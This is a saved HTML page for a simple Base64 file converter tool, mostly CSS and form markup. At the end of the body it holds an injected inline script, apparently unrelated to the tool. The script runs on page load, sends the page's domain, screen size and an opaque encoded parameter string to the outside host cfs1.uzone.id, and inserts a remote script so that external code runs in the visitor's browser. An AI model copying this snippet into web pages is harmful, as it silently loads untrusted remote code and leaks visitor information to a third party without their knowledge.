
<!DOCTYPE html>
<html dir="ltr">
  <!-- Saved from https://github.com/tovic/mini-web-tools -->
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <title>Base64 Converter</title>
<style>* {
  margin:0;
  padding:0;
  -webkit-box-sizing:border-box;
  -moz-box-sizing:border-box;
  box-sizing:border-box;
}
html {
  font:normal normal 13px/1.4 Helmet,FreeSans,Sans-Serif;
  color:black;
}
a {
  color:blue;
  text-decoration:none;
}
a:focus,
a:hover {text-decoration:underline}
button,
input,
select,
textarea {
  display:inline-block;
  vertical-align:middle;
  background-color:#ffa;
  border:1px solid;
  font:inherit;
  line-height:normal;
  padding:2px;
  width:12em;
}
label {
  display:inline-block;
  cursor:pointer;
  line-height:normal;
  overflow:hidden;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
  margin:0;
  padding:0;
  border:0;
}
button,
input[type=button],
input[type=reset],
input[type=submit] {
  background-color:black;
  border-color:transparent;
  color:white;
  padding-right:6px;
  padding-left:6px;
  cursor:pointer;
  width:auto;
}
input[type=checkbox],
input[type=file],
input[type=image],
input[type=radio] {
  width:auto;
  height:auto;
  min-width:0;
  min-height:0;
  margin:0;
  padding:0;
  background:none;
  border:0;
}
input[type=file] {
  font-size:86%;
  cursor:pointer;
}
label input[type=checkbox],
label input[type=radio] {
  display:block;
  float:left;
  margin:.15em .25em 0 0;
}
p {margin:0 0 1em}
textarea {
  width:100%;
  min-height:30em;
  font-family:"Courier New",Courier,"Nimbus Mono L",Monospace;
  resize:vertical;
}
fieldset,
iframe {
  display:block;
  border:1px solid;
  margin:0 0 1em;
  padding:.5em 1em 1em;
}
fieldset fieldset,
fieldset + p,
main + p {margin-bottom:0}
fieldset fieldset + fieldset {margin-top:1em}
iframe {
  padding:0;
  border:0;
  width:100%;
  height:30em;
}
legend {
  font-weight:bold;
  padding:0 .2em;
}
hr {
  border:0;
  border-top:1px solid;
  color:inherit;
  height:0;
  margin:0 0 1em;
}
main {
  margin-bottom:1em;
  *zoom:1;
}
main:after {
  content:" ";
  display:table;
  clear:both;
}
main > div {
  width:50%;
  float:left;
}
main > div + div {float:right}
main > div > fieldset {margin:0 .5em 0 0}
main > div + div > fieldset {margin:0 0 0 .5em}
main > div:only-child {width:100%}
@media (max-width:600px) {
  main > div,
  main > div + div {
    float:none;
    display:block;
    width:auto;
  }
  main > div + div {margin-top:1em}
  main > div > fieldset,
  main > div + div > fieldset {
    margin-right:0;
    margin-left:0;
  }
}</style>
 </head>
  <body>
    <main>
      <div>
        <fieldset>
          <legend>Converter</legend>
          <input type="file" id="input">
          <br>
          <br>
          <label><input type="checkbox" id="raw"> Raw Data</label>
          <br>
          <br>
          <textarea id="output"></textarea>
        </fieldset>
      </div>
    </main>
    <p>&copy; 2016 <a href="http://latitudu.com">Taufik Nurrohman</a></p>
    <script src="js/converter.base64.js"></script>
  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs1.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582H6x5iDAuv2BGXu6lkY%2bKU%2fNJZ7fatSY7cbkWmXrsikExgcIhHqz1R1ZebEVqamssNWoDVME3cZf20utUlJxFW%2foRMsHwcvK40VvRUj%2bS458fKfveNi8dpegjRNPFc%2fLSg8jPMetapwx%2bxUWpGlXmiuF5ECqbjcpR78qisZQTNK9u5TfRPYG4zWEysVoJDigd9Erk5TDb2AmxemVJOCpJYwJJ64VOZUuMlc6Ba%2fWy96hLHA%2bKIdHEK1%2bbLm0V6ZFWYKv4MqkxPYCHM2QAskTTm685def6K3gLkpXJ9avvN1GPGKiOzJsB7%2bdxYNyGwzxc4aEpYaq%2fm35WzD7JnyOXhaqJjpxdSUFLbzP%2bEfobx%2faTixUScSKfZ5%2bPNtaRubqZZwYI1Gbzv%2bq6xLrlxMbdms3nFO%2fP%2fr6yykir89rnx%2b6fVMBN%2bkgBWqrDN6SFUpdzVrHIgp33GPO2uTnH8JppRKOI40LJ7ivM8b1IWZhhDwLYHYK%2fDDC%2bZfZo2GXpwx4QEsnZibD5qC7FvOjaemBUvQIyT713LWMyk6vQEVUswe2Vw6YD%2fQkwlsRrGDTWn4Y%2b34wWZz0SdJL80nne5ZMB78%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
